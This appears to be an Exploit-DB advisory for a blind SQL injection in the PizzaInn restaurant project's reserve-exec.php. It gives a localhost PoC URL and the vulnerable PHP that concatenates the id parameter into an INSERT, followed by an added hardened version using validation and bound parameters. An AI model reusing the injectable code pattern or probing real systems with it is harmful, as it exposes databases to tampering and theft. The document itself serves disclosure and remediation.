exploit-db-mirror/exploits/php/webapps/31143.txt
Offensive Security d304cc3d3e DB: 2017-11-24

##########################################################################
[+] Exploit: PizzaInn_Project - SQL Injection #
[+] Author: vinicius777 #
[+] Contact: vinicius777 [AT] gmail @vinicius777_ #
[+] Vendor Homepage: http://sourceforge.net/projects/restaurantmis/ #
##########################################################################
[1] SQL Injection (Time-Based Blind)
PoC: http://127.0.0.1/reserve-exec.php?id=1' [SQL Injection]
Vulnerable Code:
[+] reserve-exec.php
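// Request parameter is taken as-is, with no validation or escaping.
$id = $_GET['id'];
// $id is concatenated straight into the INSERT statement text.
$qry = "INSERT INTO reservations_details(member_id,table_id,partyhall_id,Reserve_Date,Reserve_Time,table_flag,partyhall_flag) VALUES('$id','$table_id','$partyhall_id','$date','$time','$table_flag','$partyhall_flag')";
mysql_query($qry);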
#
#
# Greetz to g0tm1lk and TheColonial.
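
Added example (not part of the original advisory or the project's code): the same INSERT written with integer validation of id and bound parameters, run against the `1'` value from the PoC line. Assumptions: PDO is available, an in-memory SQLite table stands in for the application's MySQL database, and insertReservation() and the sample values are constructed for illustration.

```php
<?php
// Hardened form of the INSERT from reserve-exec.php (added example).
// Assumption: SQLite in memory replaces the app's MySQL database so this runs offline.
// insertReservation() is a hypothetical helper, not a function of the project.
function insertReservation(PDO $db, array $in): int
{
    // member_id arrives as $_GET['id']; accept only a positive integer.
    $id = filter_var($in['id'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('id must be a positive integer');
    }
    // Placeholders keep every value out of the SQL text, so a quote in the
    // input cannot change the structure of the statement.
    $stmt = $db->prepare(
        'INSERT INTO reservations_details
            (member_id, table_id, partyhall_id, Reserve_Date, Reserve_Time,
             table_flag, partyhall_flag)
         VALUES (:member_id, :table_id, :partyhall_id, :rdate, :rtime,
                 :table_flag, :partyhall_flag)'
    );
    $stmt->execute([
        ':member_id'      => $id,
        ':table_id'       => (int) $in['table_id'],
        ':partyhall_id'   => (int) $in['partyhall_id'],
        ':rdate'          => (string) $in['date'],
        ':rtime'          => (string) $in['time'],
        ':table_flag'     => (int) $in['table_flag'],
        ':partyhall_flag' => (int) $in['partyhall_flag'],
    ]);
    return (int) $db->lastInsertId();
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// Constructed schema: column names from the advisory, types assumed.
$db->exec('CREATE TABLE reservations_details (member_id INTEGER, table_id INTEGER,
    partyhall_id INTEGER, Reserve_Date TEXT, Reserve_Time TEXT,
    table_flag INTEGER, partyhall_flag INTEGER)');
// Constructed sample request values.
$sample = ['table_id' => 3, 'partyhall_id' => 0, 'date' => '2014-02-01',
           'time' => '19:30', 'table_flag' => 1, 'partyhall_flag' => 0];
foreach (['7', "1'"] as $id) {   // a valid id, then the value from the PoC line
    try {
        $row = insertReservation($db, ['id' => $id] + $sample);
        echo "id={$id}: stored as row {$row}\n";
    } catch (InvalidArgumentException $e) {
        echo "id={$id}: rejected ({$e->getMessage()})\n";
    }
}
echo $db->query('SELECT COUNT(*) FROM reservations_details')->fetchColumn(), " row(s) stored\n";
```

Against MySQL, build the PDO object with the application's own DSN and set PDO::ATTR_EMULATE_PREPARES to false so parameters are bound server-side. The mysql_* functions used in the vulnerable code were removed in PHP 7, so moving to PDO or mysqli is required on current PHP in any case.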